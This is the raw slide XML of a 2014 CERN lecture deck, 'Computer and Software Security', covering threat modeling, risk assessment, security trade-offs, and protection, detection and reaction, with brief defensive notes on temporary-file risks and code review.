              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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1688" y="533400"/>
            <a:ext cx="3551237" cy="2663825"/>
          </a:xfrm>
          <a:ln/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67C421-76BE-4196-A348-ED0110BF3AD6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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When your code (run as root) writes to this temporary file, it in fact overwrites you system files. Or, if the attacker is also a producer of data which goes to the temporary file, he can put some malicious code in place of normal binaries.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– and remove it later, so that an attacker couldn’t flood your /tmp by running the code many times)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A9FB3B-3D94-4061-9957-F02C55ACB087}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52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When a solution is implemented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•	Review your code, possibly with another person, and answer his questions – this helps finding bugs, and bugs can be vulnerabilities! (another talk on this)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•	try to break into your own system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>•	question to the audience; is it good to be able to (to know how to) break in to your own system? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Do you know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how to break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>into your own system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Code obfuscation?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smtClean="0"/>
              <a:t>Disabling core dumps with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>ulimit –c 0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DC71A1-FE73-4EE5-8CBB-AA8E969F57B4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>53</a:t>
            </a:fld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5578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474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36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428B7C-42A3-4953-9815-C6B21D584BEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57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6F2218-417C-4880-9BC5-71DF8CEA717F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean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00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EAC25D-E59D-4A78-B42E-110160D1102A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000" b="1" smtClean="0"/>
              <a:t>Means different things to different people, or even to the same person, depending on the context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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sz="1000" b="1" smtClean="0"/>
              <a:t>“for most developers, security is like pornography is to the US Supreme Court: they may not be able to define it, but they think they know when they see it” (BSS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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1000" b="1" smtClean="0"/>
              <a:t>There is some implicit understanding about what could be a security breach and what couldn’t – usually based on consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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1000" b="1" smtClean="0"/>
              <a:t>not a feature that you turn on and off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1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50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375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048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0624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2490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7789E-84FF-459F-BED9-B24ED7B29154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5746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067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9082C1-988C-401B-9390-1EE794A34AFB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>68</a:t>
            </a:fld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61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19CF7D2-A988-4718-9EAA-B1481F22DA3E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sz="1000" b="1" dirty="0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5F9CE-C583-4053-989E-CC277F4509B1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5258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8516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8683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6AC8F3-51F8-4D54-83BC-ABB0A4E5E56E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>73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WAKE UP! It is over!</a:t>
            </a:r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E7CA09-0D56-48AA-891F-36C1524CD677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764884-A1C7-4DF5-92A5-E766EA74009F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414337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939800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05448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2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180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42799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281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9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8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3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538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139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249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414337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939800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7137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Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="350838" y="6489700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28682264-DDA2-4855-BAE7-D02A2170A84F}" type="slidenum">
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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>
            <a:off x="1530350" y="6540500"/>
            <a:ext cx="254757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300" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Computer and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> software security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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4860032" y="6540500"/>
            <a:ext cx="418425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l-PL" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sebastian Lopienski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CERN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1300" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1300" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Security Team</a:t>
            </a:r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7993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11200" indent="-2651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300">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1079500" indent="-1889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35100" indent="-1762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90700" indent="-1762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2479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051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23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195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21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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.cam.ac.uk/~rja14/book.html" TargetMode="External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hyperlink" Target="http://security.web.cern.ch/security/recommendations/en/code_tools.shtml" TargetMode="Externa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0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owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External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30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34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916113"/>
            <a:ext cx="8053387" cy="4608512"/>
          </a:xfrm>
          <a:noFill/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sz="4300" dirty="0" smtClean="0">
                <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Computer and Software Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4300" dirty="0" smtClean="0">
              <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0"/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Sebastian Lopienski</a:t>
            </a:r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CERN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deputy Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Officer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2000" dirty="0" err="1" smtClean="0"/>
              <a:t>openlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> and summer student lectures 2014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887480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9698" name="Picture 2" descr="E:\Local\2010.06 Sec Day\securing\img\failcame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3775" y="1125538"/>
            <a:ext cx="7899400" cy="49672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 bwMode="auto">
          <a:xfrm rot="399985">
            <a:off x="303213" y="4821238"/>
            <a:ext cx="3822700" cy="1703387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measures that get disabled with time, when new features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are installed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21264967">
            <a:off x="5807893" y="5308618"/>
            <a:ext cx="3174366" cy="1269596"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security 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is a process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much security?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Total</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> security is unachievable</a:t>
            </a:r>
          </a:p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/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trade-off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: more security often means</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>higher cost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>less convenience / productivity / functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security measures should be as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invisible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>cannot irritate users or slow down the software (too much) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>example: forcing a password change everyday </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>users will find a workaround, or just stop using it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Choose security level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>relevant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to your needs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 4" descr="MCj0290811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1946275"/>
            <a:ext cx="158908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Threat Modeling and Risk Assessment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Threat modeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: what threats will the system face?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>what could go wrong? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how could the system be attacked and by whom?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC33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Risk assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: how much to worry about them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>calculate or estimate potential loss and its likelihood </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>risk management – reduce both probability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>consequences of a security breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   risk = probability * impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="446087" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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20307"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6736060" y="4293096"/>
          <a:ext cx="2034102" cy="1481982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678034"/>
                <a:gridCol w="678034"/>
                <a:gridCol w="678034"/>
              </a:tblGrid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6012160" y="4365305"/>
            <a:ext cx="2664295" cy="2016199"/>
            <a:chOff x="2059037" y="2981739"/>
            <a:chExt cx="3241833" cy="2361437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>
              <a:off x="2782972" y="4955691"/>
              <a:ext cx="2517898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TextBox 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688227" y="4943066"/>
              <a:ext cx="13548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GB" sz="2000" b="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>probability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rot="16200000" flipV="1">
              <a:off x="1692044" y="3853581"/>
              <a:ext cx="1743683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 rot="-5400000">
              <a:off x="1789251" y="4154556"/>
              <a:ext cx="93968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GB" sz="2000" b="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>impact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33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Threat Modeling and Risk Assessment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360613" y="1077913"/>
            <a:ext cx="6357937" cy="5184775"/>
            <a:chOff x="1639" y="845"/>
            <a:chExt cx="4416" cy="3600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20486" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1639" y="845"/>
              <a:ext cx="4416" cy="36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endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20487" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1783" y="1133"/>
              <a:ext cx="4128" cy="182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b"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>enterprise firewall</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20488" name="Rectangle 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2071" y="1325"/>
              <a:ext cx="1536" cy="672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server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20489" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1879" y="3677"/>
              <a:ext cx="129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WWW browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20490" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2983" y="2333"/>
              <a:ext cx="624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SOAP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20491" name="Rectangle 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2071" y="2045"/>
              <a:ext cx="153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Apache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20492" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2695" y="3965"/>
              <a:ext cx="1392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client application</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20493" name="AutoShape 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4519" y="1421"/>
              <a:ext cx="576" cy="480"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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DB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20494" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311" y="3101"/>
              <a:ext cx="1392" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -38292"/>
                <a:gd name="adj2" fmla="val 14583"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="99CCFF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pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20495" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4279" y="2333"/>
              <a:ext cx="105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r>
                <a:rPr lang="en-US"/>
                <a:t>admin tools</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20496" name="AutoShape 15"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="20488" idx="3"/>
              <a:endCxn id="20493" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3607" y="1661"/>
              <a:ext cx="91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7" name="AutoShape 16"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="20489" idx="0"/>
              <a:endCxn id="20491" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2527" y="2285"/>
              <a:ext cx="312" cy="139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8" name="AutoShape 17"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="20492" idx="0"/>
              <a:endCxn id="20490" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3295" y="2573"/>
              <a:ext cx="96" cy="139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9" name="AutoShape 18"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="20495" idx="0"/>
              <a:endCxn id="20493" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4807" y="1901"/>
              <a:ext cx="0" cy="4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3121025" y="4949825"/>
            <a:ext cx="50482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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF33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5356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3477E-6 1.34454E-6 L 0.1689 0.05651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7" y="2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9 0.05651 L 0.12357 -0.10483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7" y="-80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57 -0.10483 L 0.1689 -0.2863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7" y="-90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9 -0.28635 L 0.28223 -0.44769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7" y="-80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223 -0.44769 L 0.38801 -0.3468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9" y="5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9" grpId="0"/>
      <p:bldP spid="71699" grpId="1"/>
      <p:bldP spid="71699" grpId="2"/>
      <p:bldP spid="71699" grpId="3"/>
      <p:bldP spid="71699" grpId="4"/>
      <p:bldP spid="71699" grpId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20" descr="C:\Sebastian\CERN\my presentations\future\camera-f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1268413"/>
            <a:ext cx="8642350" cy="48641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21076162">
            <a:off x="4919663" y="4935538"/>
            <a:ext cx="3822700" cy="132556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solutions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do not cover the whole exposure area</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150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alar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708275"/>
            <a:ext cx="2003425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Protection, detection, reaction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i="1" smtClean="0"/>
              <a:t>An ounce of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevention </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>is worth a pound of cure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-271463" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>better to protect that to recover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is necessary </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>because total prevention </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is impossible to achieve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p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smtClean="0"/>
              <a:t>Without some kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>detection is useless </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-271463" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>like a burglar alarm </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>that no-one listens and responds to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77829" name="Picture 5" descr="padl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75" y="1125538"/>
            <a:ext cx="1209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6" descr="police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4552950"/>
            <a:ext cx="2281237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" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-door-f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50" y="1052513"/>
